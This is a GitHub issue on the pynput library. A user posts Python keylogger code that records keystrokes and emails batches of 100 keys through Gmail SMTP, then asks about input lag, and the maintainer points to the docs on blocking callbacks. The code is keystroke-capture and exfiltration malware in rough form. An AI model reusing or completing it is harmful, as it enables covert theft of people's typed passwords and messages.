### ISSUE TITLE
Heavy delay input on some specific code parts 

### ISSUE THREAD

**Issue by vitormndc** [moses-palmer/pynput#157]
Hi, I'm writing a keylogger as one of my first projects, everything works fine until I try to send the data thru email at this point the input from the keyboard gets heavily delayed(almost like slow motion). I tried to pause the listener, but it made no difference 

```
from pynput.keyboard import Listener
import smtplib, ssl



def send_mail():
    password = input("password=")
    with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=ssl.create_default_context()) as server:
        server.login("sender@gmail", password)
        server.sendmail("sender@gmail.com", "reciever@gmail.com", string)
        server.quit()


def on_press(key):
   #gather data and save it to _list

    if len(_list) > 100:
        global string
        for i in _list:
            string += i
        send_mail()


with Listener(on_press=on_press) as listener:
    listener.join()

```

The script gathers 100 keys then store it in a string and send it thru email. The input lag begun as soon as send_mail() is called.
Sorry for any typo or hard to understand explanation

**Comment by moses-palmer** [comment]
Please consult the documentation about blocking operations in the event callback [here](https://pynput.readthedocs.io/en/latest/keyboard.html#the-keyboard-listener-thread).

The _tldr;_ is that no _slowish_ operations should be performed in the event callback, as it will impose severe lag on the system input handling.
